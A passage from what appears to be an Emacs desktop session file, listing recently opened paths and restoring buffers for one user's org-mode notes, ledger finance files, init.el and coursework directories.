#("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/reinas.pl" 0 67 (ivy-index 2)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/reinas-3.pl" 0 69 (ivy-index 1)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/Servi.pl" 0 66 (ivy-index 1)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/cliente.py" 0 68 (ivy-index 1)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/GUIClase.py" 0 69 (ivy-index 1)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/" 0 58 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Lenguajes/11Sem/chess_svg.py" 0 57 (ivy-index 14)) #("/home/luisbarrera/.emacs.d/" 0 27 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/" 0 52 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/chess_svg.py" 0 70 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Proyecto/codigo_blob.py" 0 52 (ivy-index 12)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/funcional.py" 0 70 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/ck" 0 60 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Lenguajes/11Sem/GUIClase.py" 0 56 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Lenguajes/GUIClase.py" 0 50 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Lenguajes/10Sem/frac-egipcias.py" 0 61 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Fis-Comp/10Sem/45-omega.png" 0 69 (ivy-index 6)) #("/home/luisbarrera/google-drive/Trim10-22I/Fis-Comp/10Sem/180-angulos.png" 0 72 (ivy-index 3)) #("/home/luisbarrera/google-drive/Trim10-22I/Fis-Comp/10Sem/45-angulos.png" 0 71 (ivy-index 3)) #("/home/luisbarrera/Trim10-22I/Fis-Comp/10Sem/examen2.org" 0 55 (ivy-index 0)) #("/home/luisbarrera/teim" 0 22 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Fis-Comp/07Sem/pendulo-examen.py" 0 61 (ivy-index 6)) #("/home/luisbarrera/google-drive/org-mode/finances.ledger" 0 55 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/04Sem/frac-egipcias.hs" 0 74 (ivy-index 1)) #("/home/luisbarrera/google-drive/org-roam/anki.org" 0 48 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-roam/anki-aleman.org" 0 55 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Lenguajes/09Sem/ejer1.py" 0 53 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/09Sem/notebook.ipynb" 0 72 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/09Sem/clase2.py" 0 67 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/Lenguajes/09Sem/python.py" 0 54 (ivy-index 0)) #("/home/luisbarrera/Trim10-22I/ABAP/primer-examen.org" 0 51 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/tmp.org" 0 47 (ivy-index 1)) #("/home/luisbarrera/google-drive/org-mode/personal.ledger" 0 55 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/finances.dat" 0 52 (ivy-index 0)) #("/home/luisbarrera/Trim10-21I/Lenguajes/01Sem/haskell/test.hs" 0 60 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/Clases21I.org" 0 53 (ivy-index 0)) #("/home/luisbarrera/dev/ani-cli/ani-cli" 0 37 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/maestria.org" 0 52 (ivy-index 0)) #("/home/luisbarrera/.emacs.el" 0 27 (ivy-index 1)) #("/home/luisbarrera/google-drive/Trim9-21O/EmTech-DataScience/P1 - ejemplo de login/main.py" 0 89 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/EmTech-DataScience/proyecto1/lifestore_file.py" 0 87 (ivy-index 0)) #("/home/luisbarrera/Trim9-21O/EmTech-DataScience/proyecto1/main.py" 0 64 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/Heuristicas/10Sem/tarea3/awk1.awk" 0 74 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/Heuristicas/10Sem/tarea3/plot.p" 0 72 (ivy-index 3)) #("/home/luisbarrera/google-drive/Trim9-21O/Heuristicas/10Sem/tarea3/boxplot.m" 0 75 (ivy-index 0)) #("/home/luisbarrera/Trim9-21O/Heuristicas/10Sem/tarea3/plot.p" 0 59 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/Heuristicas/10Sem/tarea3/recocido_simulado.py" 0 86 (ivy-index 0)) #("/home/luisbarrera/Trim9-21O/Heuristicas/10Sem/tarea3/abejas.py" 0 62 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-roam/20220123180828-data_science_emtech.org" 0 78 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-roam/20220122223000-menstruacion_femenina.org" 0 80 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/animacion/servidor.js" 0 84 (ivy-index 3)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/08Sem/datos/index.html" 0 79 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/08Sem/Chart/chartjs/marcador.html" 0 90 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/servicios/mapas.html" 0 83 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/servicios/servidor.js" 0 84 (ivy-index 0)) #("/home/luisbarrera/Trim9-21O/SelectosIngSoft/09Sem/juegoPhaser/servidor.js" 0 73 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/Node/calculadora/response.json" 0 93 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/Node/calculadora/servidor.js" 0 91 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/Node/web2/web.js" 0 79 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/Node/web2/index.html" 0 83 (ivy-index 2)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/Node/web/web.js" 0 78 (ivy-index 0)) #("/home/luisbarrera/Trim9-21O/SelectosIngSoft/09Sem/Node/js/simple.js" 0 67 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/juegoPhaser/juego.html" 0 85 (ivy-index 3)) #("/home/luisbarrera/google-drive/Trim9-21O/SelectosIngSoft/09Sem/juegoPhaser/servidor.js" 0 86 (ivy-index 0)) #("/home/luisbarrera/Trim9-21O/SelectosIngSoft/09Sem/juegoPhaser/juego.html" 0 72 (ivy-index 3)) #("/home/luisbarrera/Trim9-21O/SelectosIngSoft/08Sem/datos/index.html" 0 66 (ivy-index 6))))

;; Buffer section -- buffers listed in same order as in buffer list:
(desktop-create-buffer 208
  "/home/luisbarrera/org-roam/20220828192740-proceso_de_datos_sucios_a_datos_limpios.org"
  "20220828192740-proceso_de_datos_sucios_a_datos_limpios.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode company-box-mode projectile-mode)
  4035
  '(4035 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 31800 795539 239000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (4035 1852 986 597))))

(desktop-create-buffer 208
  "/home/luisbarrera/google-drive/org-mode/todos.org"
  "todos.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode text-scale-mode buffer-face-mode company-box-mode projectile-mode)
  8461
  '(55744 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 34202 333042 688000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (55745 55246 80913 25833 121344 124815 15565 80975 15101 9651 55517 55366 15037 55366 55246 15150))))

(desktop-create-buffer 208
  "/home/luisbarrera/google-drive/org-mode/finances.ledger"
  "finances.ledger"
  'ledger-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode company-mode company-posframe-mode drag-stuff-mode diff-hl-mode text-scale-mode buffer-face-mode company-box-mode projectile-mode)
  11414
  '(11415 nil)
  nil
  nil
  '((buffer-display-time 25359 34202 333041 274000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (11734 11574 11257 11257 11759 16521 15854 15801 15748 13804 9938 7875 7181 3797 3272 3220))))

(desktop-create-buffer 208
  "/home/luisbarrera/google-drive/org-mode/tareas22p.org"
  "tareas22p.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode text-scale-mode buffer-face-mode company-box-mode projectile-mode)
  139
  '(17 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 34202 333040 687000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (4412 4489 17 19 19 17 4367 17 17 4367 10117 4367 3594 4544 3652 2))))

(desktop-create-buffer 208
  "/home/luisbarrera/google-drive/org-mode/clases22p.org"
  "clases22p.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode text-scale-mode company-box-mode projectile-mode)
  6
  '(6 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 34202 333039 638000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (47 6 583 180 583 497 6 583 583 583 583 496 6 6 44 44))))

(desktop-create-buffer 208
  "/home/luisbarrera/google-drive/org-mode/index.org"
  "index.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode text-scale-mode buffer-face-mode company-box-mode projectile-mode)
  6558
  '(6558 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 34202 333041 79000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (6818 6493 18 6558 6558 6558 6558 27193 2125 9669 13264 2013 2014 4273 6848 9524))))

(desktop-create-buffer 208
  "/home/luisbarrera/.dotfiles/emacs/.emacs.d/init.el"
  "init.el"
  'emacs-lisp-mode
  '(visual-line-mode eldoc-mode evil-collection-unimpaired-mode which-key-mode override-global-mode company-mode company-posframe-mode linum-relative-mode smartparens-mode drag-stuff-mode aggressive-indent-mode page-break-lines-mode diff-hl-mode indent-guide-mode auto-revert-mode company-box-mode projectile-mode rainbow-delimiters-mode hl-todo-mode)
  52950
  '(52950 nil)
  nil
  nil
  '((buffer-display-time 25359 29490 382061 35000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (52804 39114 39113 41011 41011 12054 12054 6866 1599 55702 55702 52477 52477 52392 52392 52393))))

(desktop-create-buffer 208
  "/home/luisbarrera/google-drive/org-roam/20220515235923-data_science_certificacion_de_google.org"
  "20220515235923-data_science_certificacion_de_google.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode company-box-mode projectile-mode)
  595
  '(595 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 29492 305149 632000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring nil)))

(desktop-create-buffer 208
  "/home/luisbarrera/org-mode/draft.org"
  "draft.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode company-box-mode projectile-mode)
  12026
  '(12026 nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 29494 891022 300000) (buffer-file-coding-system . utf-8-unix) (overwrite-mode) (truncate-lines))
  '((mark-ring (12094 10931 1601 1490 12095 12095 12095 11604 1182 11008 11008 12095 12095 12094 12068 12095))))

(desktop-create-buffer 208
  "/home/luisbarrera/org-mode/tareas21p.org"
  "tareas21p.org"
  'org-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode evil-org-mode org-indent-mode company-mode company-posframe-mode drag-stuff-mode page-break-lines-mode diff-hl-mode company-box-mode projectile-mode)
  1
  '(nil nil)
  nil
  nil
  '((indent-tabs-mode) (buffer-display-time 25359 29495 996933 915000) (overwrite-mode) (truncate-lines))
  '((mark-ring nil)))

(desktop-create-buffer 208
  "/home/luisbarrera/.emacs.d/diary"
  "diary"
  'fundamental-mode
  '(visual-line-mode evil-collection-unimpaired-mode which-key-mode override-global-mode company-mode company-posframe-mode drag-stuff-mode diff-hl-mode buffer-face-mode company-box-mode projectile-mode)
  1
  '(nil nil)
  nil
  nil
  '((buffer-display-time) (overwrite-mode) (truncate-lines))
  '((mark-ring nil)))

